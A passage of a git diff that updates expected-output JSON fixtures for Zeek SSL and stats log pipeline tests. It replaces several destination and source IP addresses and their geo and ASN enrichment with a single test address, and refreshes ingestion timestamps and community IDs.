"{\"ts\":1547688736.805088,\"uid\":\"CAOvs1BMFCX2Eh0Y3\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63199,\"id.resp_h\":\"35.199.178.4\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FebkbHWVCV8rEEEne\",\"F4BDY41MGUBT6URZMd\",\"FWlfEfiHVkv8evDL3\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}", + "ingested": "2021-12-09T13:51:13.148709Z", + "original": "{\"ts\":1547688736.805088,\"uid\":\"CAOvs1BMFCX2Eh0Y3\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63199,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FebkbHWVCV8rEEEne\",\"F4BDY41MGUBT6URZMd\",\"FWlfEfiHVkv8evDL3\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CAOvs1BMFCX2Eh0Y3", @@ -128,30 +128,30 @@ }, { "server": { - "address": "35.199.178.4" + "address": "89.160.20.156" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -122.0748, - "lat": 37.4043 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "35.199.178.4", + "address": "89.160.20.156", "port": 9243, - "ip": "35.199.178.4" + "ip": "89.160.20.156" }, "zeek": { "session_id": "C3mki91FnnNtm0u1ok", @@ -195,7 +195,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:zYbLmqRN6PLPB067HNAiAQISqvI=", + "community_id": "1:T1e0tVyO3Xy/awpYLS6XqIYzpm4=", "transport": "tcp" }, "@timestamp": "2019-01-17T01:32:16.805Z", @@ -205,7 +205,7 @@ "related": { "ip": [ "10.178.98.102", - "35.199.178.4" + "89.160.20.156" ] }, "client": { @@ -238,8 +238,8 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-08-11T19:18:40.056087700Z", - "original": "{\"ts\":1547688736.80509,\"uid\":\"C3mki91FnnNtm0u1ok\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63198,\"id.resp_h\":\"35.199.178.4\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"Fue9H32OmuitQk2zR\",\"FpbiBP215tk2xftxM6\",\"FEdROj1vUzTGw3BIUa\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}", + "ingested": "2021-12-09T13:51:13.148717100Z", + "original": "{\"ts\":1547688736.80509,\"uid\":\"C3mki91FnnNtm0u1ok\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63198,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"Fue9H32OmuitQk2zR\",\"FpbiBP215tk2xftxM6\",\"FEdROj1vUzTGw3BIUa\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C3mki91FnnNtm0u1ok", @@ -254,30 +254,30 @@ }, { "server": { - "address": "35.199.178.4" + "address": "89.160.20.156" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -122.0748, - "lat": 37.4043 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "35.199.178.4", + "address": "89.160.20.156", "port": 9243, - "ip": "35.199.178.4" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CfGBt82PzCXzHa0iek", @@ -321,7 +321,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:uvtDP+7asGjibinsGcMqvj9yAoc=", + "community_id": "1:mDZkdHx1U/LONMQj/IW5B+esLpU=", "transport": "tcp" }, "@timestamp": "2019-01-17T01:32:16.805Z", @@ -331,7 +331,7 @@ "related": { "ip": [ "10.178.98.102", - "35.199.178.4" + "89.160.20.156" ] }, "client": { @@ -364,8 +364,8 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-08-11T19:18:40.056095400Z", - "original": "{\"ts\":1547688736.805527,\"uid\":\"CfGBt82PzCXzHa0iek\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63197,\"id.resp_h\":\"35.199.178.4\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FiFLYv3UjeWyv2gcW\",\"FvSsiB1Xi816EMagI9\",\"FWpPS4mjGaAhTRXLf\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}{\"ts\":1602179457.352156,\"uid\":\"CK17Dl2SB8bZOVonSl\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":49228,\"id.resp_h\":\"192.168.50.1\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_RSA_WITH_AES_128_CBC_SHA256\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FOLwYQ6rs70bIMSf9\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=foo,OU=foo@bar,O=org,L=locality,C=LO\",\"issuer\":\"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI\",\"validation_status\":\"self signed certificate\",\"ja3\":\"74927e242d6c3febf8cb9cab10a7f889\",\"ja3s\":\"80b3a14bccc8598a1f3bbe83e71f735f\",\"resp_certificate_sha1\":\"5dad8b55621b6b9c30679d9d61248dd132a83c94\",\"not_valid_before\":1562022421,\"not_valid_after\":1577748224}", + "ingested": "2021-12-09T13:51:13.148722600Z", + "original": "{\"ts\":1547688736.805527,\"uid\":\"CfGBt82PzCXzHa0iek\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63197,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FiFLYv3UjeWyv2gcW\",\"FvSsiB1Xi816EMagI9\",\"FWpPS4mjGaAhTRXLf\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}{\"ts\":1602179457.352156,\"uid\":\"CK17Dl2SB8bZOVonSl\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":49228,\"id.resp_h\":\"192.168.50.1\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_RSA_WITH_AES_128_CBC_SHA256\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FOLwYQ6rs70bIMSf9\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=foo,OU=foo@bar,O=org,L=locality,C=LO\",\"issuer\":\"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI\",\"validation_status\":\"self signed certificate\",\"ja3\":\"74927e242d6c3febf8cb9cab10a7f889\",\"ja3s\":\"80b3a14bccc8598a1f3bbe83e71f735f\",\"resp_certificate_sha1\":\"5dad8b55621b6b9c30679d9d61248dd132a83c94\",\"not_valid_before\":1562022421,\"not_valid_after\":1577748224}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CfGBt82PzCXzHa0iek", @@ -380,30 +380,30 @@ }, { "server": { - "address": "46.101.87.151" + "address": "89.160.20.156" }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -0.6658, - "lat": 51.5353 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 14061, + "number": 29518, "organization": { - "name": "DigitalOcean, LLC" + "name": "Bredband2 AB" } }, - "address": "46.101.87.151", + "address": "89.160.20.156", "port": 443, - "ip": "46.101.87.151" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CLQiVH1VcpvT3ruEak", @@ -423,7 +423,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:+VR+JlXwG/gg/ZUYvCR2rvevo0k=", + "community_id": "1:84R2RN+brLLXY5a655kWOa92AaU=", "transport": "tcp" }, "@timestamp": "2021-03-30T08:00:51.151Z", @@ -433,7 +433,7 @@ "related": { "ip": [ "10.156.0.2", - "46.101.87.151" + "89.160.20.156" ] }, "client": { @@ -447,8 +447,8 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-08-11T19:18:40.056102500Z", - "original": "{\"ts\":1617091251.151303,\"uid\":\"CLQiVH1VcpvT3ruEak\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":52730,\"id.resp_h\":\"46.101.87.151\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256\",\"resumed\":false,\"established\":false}", + "ingested": "2021-12-09T13:51:13.148729700Z", + "original": "{\"ts\":1617091251.151303,\"uid\":\"CLQiVH1VcpvT3ruEak\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":52730,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256\",\"resumed\":false,\"established\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CLQiVH1VcpvT3ruEak", @@ -483,26 +483,31 @@ "source": { "geo": { "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 8.0, - "lat": 47.0 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "35.195.125.46", + "address": "89.160.20.156", "port": 52678, - "ip": "35.195.125.46" + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:V4vQxEzysZJXVi6XPnzaFJyex/U=", + "community_id": "1:o7CNmLDj8ywpyR9JIy0bbNTRF2I=", "transport": "tcp" }, "@timestamp": "2021-03-30T07:55:55.826Z", @@ -511,20 +516,20 @@ }, "related": { "ip": [ - "35.195.125.46", + "89.160.20.156", "10.156.0.2" ] }, "client": { - "address": "35.195.125.46" + "address": "89.160.20.156" }, "tls": { "established": false, "resumed": false }, "event": { - "ingested": "2021-08-11T19:18:40.056109500Z", - "original": "{\"ts\":1617090955.826099,\"uid\":\"CBiXOC4IqYxMv1xzf9\",\"id.orig_h\":\"35.195.125.46\",\"id.orig_p\":52678,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"splunk-api.swiftcrypto.com\",\"resumed\":false,\"established\":false}", + "ingested": "2021-12-09T13:51:13.148735100Z", + "original": "{\"ts\":1617090955.826099,\"uid\":\"CBiXOC4IqYxMv1xzf9\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":52678,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"splunk-api.swiftcrypto.com\",\"resumed\":false,\"established\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CBiXOC4IqYxMv1xzf9", @@ -558,32 +563,32 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -122.0748, - "lat": 37.4043 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "35.198.74.222", + "address": "89.160.20.156", "port": 53368, - "ip": "35.198.74.222" + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:V9Qt7/8w9KL4Jtxsk2LcLXE5N8w=", + "community_id": "1:qU0yBQFobo0fdEdqyhiUVIXuFLk=", "transport": "tcp" }, "@timestamp": "2021-03-30T08:00:53.726Z", @@ -592,20 +597,20 @@ }, "related": { "ip": [ - "35.198.74.222", + "89.160.20.156", "10.156.0.2" ] }, "client": { - "address": "35.198.74.222" + "address": "89.160.20.156" }, "tls": { "established": false, "resumed": false }, "event": { - "ingested": "2021-08-11T19:18:40.056131800Z", - "original": "{\"ts\":1617091253.726384,\"uid\":\"C4jH9IqWGZwc1PPUh\",\"id.orig_h\":\"35.198.74.222\",\"id.orig_p\":53368,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"tickets.swiftcrypto.com\",\"resumed\":false,\"established\":false}", + "ingested": "2021-12-09T13:51:13.148740400Z", + "original": "{\"ts\":1617091253.726384,\"uid\":\"C4jH9IqWGZwc1PPUh\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":53368,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"tickets.swiftcrypto.com\",\"resumed\":false,\"established\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C4jH9IqWGZwc1PPUh", @@ -639,32 +644,32 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -122.0748, - "lat": 37.4043 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "35.198.74.222", + "address": "89.160.20.156", "port": 53382, - "ip": "35.198.74.222" + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:66wO2xP2DlLDi2zicRph+DuA9/E=", + "community_id": "1:ON+uQUJwRgcpz0HTu+Si0zZ3sQM=", "transport": "tcp" }, "@timestamp": "2021-03-30T08:00:53.918Z", @@ -673,20 +678,20 @@ }, "related": { "ip": [ - "35.198.74.222", + "89.160.20.156", "10.156.0.2" ] }, "client": { - "address": "35.198.74.222" + "address": "89.160.20.156" }, "tls": { "established": false, "resumed": false }, "event": { - "ingested": "2021-08-11T19:18:40.056137600Z", - "original": "{\"ts\":1617091253.91861,\"uid\":\"CXVMSq6Dainy4WFN9\",\"id.orig_h\":\"35.198.74.222\",\"id.orig_p\":53382,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"rundeck.swiftcrypto.com\",\"resumed\":false,\"established\":false}", + "ingested": "2021-12-09T13:51:13.148744300Z", + "original": "{\"ts\":1617091253.91861,\"uid\":\"CXVMSq6Dainy4WFN9\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":53382,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"rundeck.swiftcrypto.com\",\"resumed\":false,\"established\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CXVMSq6Dainy4WFN9", @@ -701,29 +706,30 @@ }, { "server": { - "address": "104.154.89.105" + "address": "89.160.20.156" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "104.154.89.105", + "address": "89.160.20.156", "port": 443, - "ip": "104.154.89.105" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CsgtQe4AikDZBsIM6k", @@ -752,7 +758,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:3IMDpvf8yf3uCJdX1xBFecnUlJQ=", + "community_id": "1:1xbXcGs+AB73/QBDvRvHCyrmmys=", "transport": "tcp" }, "@timestamp": "2021-03-30T08:00:54.325Z", @@ -762,7 +768,7 @@ "related": { "ip": [ "10.156.0.2", - "104.154.89.105" + "89.160.20.156" ] }, "client": { @@ -777,8 +783,8 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-08-11T19:18:40.056142700Z", - "original": "{\"ts\":1617091254.325291,\"uid\":\"CsgtQe4AikDZBsIM6k\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":55120,\"id.resp_h\":\"104.154.89.105\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256\",\"curve\":\"secp256r1\",\"resumed\":false,\"established\":false,\"cert_chain_fuids\":[\"FeyRIk4nUtwwcUcnRf\"],\"client_cert_chain_fuids\":[],\"validation_status\":\"self signed certificate\"}", + "ingested": "2021-12-09T13:51:13.148748600Z", + "original": "{\"ts\":1617091254.325291,\"uid\":\"CsgtQe4AikDZBsIM6k\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":55120,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256\",\"curve\":\"secp256r1\",\"resumed\":false,\"established\":false,\"cert_chain_fuids\":[\"FeyRIk4nUtwwcUcnRf\"],\"client_cert_chain_fuids\":[],\"validation_status\":\"self signed certificate\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CsgtQe4AikDZBsIM6k", @@ -813,26 +819,31 @@ "source": { "geo": { "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 8.0, - "lat": 47.0 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "35.195.125.46", + "address": "89.160.20.156", "port": 53095, - "ip": "35.195.125.46" + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:4MfNex5Y2459jCDB+JNoM6rXM2U=", + "community_id": "1:2TaCqfGGsCmjDCnDvX6r2WUiP3w=", "transport": "tcp" }, "@timestamp": "2021-03-30T08:00:55.065Z", @@ -841,20 +852,20 @@ }, "related": { "ip": [ - "35.195.125.46", + "89.160.20.156", "10.156.0.2" ] }, "client": { - "address": "35.195.125.46" + "address": "89.160.20.156" }, "tls": { "established": false, "resumed": false }, "event": { - "ingested": "2021-08-11T19:18:40.056148700Z", - "original": "{\"ts\":1617091255.065602,\"uid\":\"CPGhJS3UPpcnR96NQc\",\"id.orig_h\":\"35.195.125.46\",\"id.orig_p\":53095,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"splunk-api.swiftcrypto.com\",\"resumed\":false,\"established\":false}", + "ingested": "2021-12-09T13:51:13.148753700Z", + "original": "{\"ts\":1617091255.065602,\"uid\":\"CPGhJS3UPpcnR96NQc\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":53095,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"splunk-api.swiftcrypto.com\",\"resumed\":false,\"established\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CPGhJS3UPpcnR96NQc", @@ -869,7 +880,7 @@ }, { "server": { - "address": "35.199.178.4" + "address": "89.160.20.156" }, "log": { "file": { @@ -878,26 +889,26 @@ }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -122.0748, - "lat": 37.4043 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "35.199.178.4", + "address": "89.160.20.156", "port": 9243, - "ip": "35.199.178.4" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CfGBt82PzCXzHa0iek", @@ -941,7 +952,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:uvtDP+7asGjibinsGcMqvj9yAoc=", + "community_id": "1:mDZkdHx1U/LONMQj/IW5B+esLpU=", "transport": "tcp" }, "@timestamp": "2019-01-17T01:32:16.805Z", @@ -951,7 +962,7 @@ "related": { "ip": [ "10.178.98.102", - "35.199.178.4" + "89.160.20.156" ] }, "host": { @@ -987,8 +998,8 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-08-11T19:18:40.056173500Z", - "original": "{\"ts\":1547688736.805527,\"uid\":\"CfGBt82PzCXzHa0iek\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63197,\"id.resp_h\":\"35.199.178.4\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FiFLYv3UjeWyv2gcW\",\"FvSsiB1Xi816EMagI9\",\"FWpPS4mjGaAhTRXLf\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}{\"ts\":1602179457.352156,\"uid\":\"CK17Dl2SB8bZOVonSl\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":49228,\"id.resp_h\":\"192.168.50.1\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_RSA_WITH_AES_128_CBC_SHA256\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FOLwYQ6rs70bIMSf9\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=foo,OU=foo@bar,O=org,L=locality,C=LO\",\"issuer\":\"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI\",\"validation_status\":\"self signed certificate\",\"ja3\":\"74927e242d6c3febf8cb9cab10a7f889\",\"ja3s\":\"80b3a14bccc8598a1f3bbe83e71f735f\",\"resp_certificate_sha1\":\"5dad8b55621b6b9c30679d9d61248dd132a83c94\",\"not_valid_before\":1562022421,\"not_valid_after\":1577748224}", + "ingested": "2021-12-09T13:51:13.148758300Z", + "original": "{\"ts\":1547688736.805527,\"uid\":\"CfGBt82PzCXzHa0iek\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63197,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FiFLYv3UjeWyv2gcW\",\"FvSsiB1Xi816EMagI9\",\"FWpPS4mjGaAhTRXLf\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}{\"ts\":1602179457.352156,\"uid\":\"CK17Dl2SB8bZOVonSl\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":49228,\"id.resp_h\":\"192.168.50.1\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_RSA_WITH_AES_128_CBC_SHA256\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FOLwYQ6rs70bIMSf9\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=foo,OU=foo@bar,O=org,L=locality,C=LO\",\"issuer\":\"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI\",\"validation_status\":\"self signed certificate\",\"ja3\":\"74927e242d6c3febf8cb9cab10a7f889\",\"ja3s\":\"80b3a14bccc8598a1f3bbe83e71f735f\",\"resp_certificate_sha1\":\"5dad8b55621b6b9c30679d9d61248dd132a83c94\",\"not_valid_before\":1562022421,\"not_valid_after\":1577748224}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CfGBt82PzCXzHa0iek", diff --git a/packages/zeek/data_stream/stats/_dev/test/pipeline/test-stats.log-expected.json b/packages/zeek/data_stream/stats/_dev/test/pipeline/test-stats.log-expected.json index b759967a5e9..d5324a0a333 100644 --- a/packages/zeek/data_stream/stats/_dev/test/pipeline/test-stats.log-expected.json +++ b/packages/zeek/data_stream/stats/_dev/test/pipeline/test-stats.log-expected.json @@ -54,7 +54,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:42.255855100Z", + "ingested": "2021-12-09T13:51:15.427176300Z", "original": "{\"ts\":1476605878.714844,\"peer\":\"bro\",\"mem\":94,\"pkts_proc\":296,\"bytes_recv\":39674,\"events_proc\":723,\"events_queued\":728,\"active_tcp_conns\":1,\"active_udp_conns\":3,\"active_icmp_conns\":0,\"tcp_conns\":6,\"udp_conns\":36,\"icmp_conns\":2,\"timers\":797,\"active_timers\":38,\"files\":0,\"active_files\":0,\"dns_requests\":0,\"active_dns_requests\":0,\"reassem_tcp_size\":0,\"reassem_file_size\":0,\"reassem_frag_size\":0,\"reassem_unknown_size\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "metric" @@ -125,7 +125,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:42.255870500Z", + "ingested": "2021-12-09T13:51:15.427184700Z", "original": 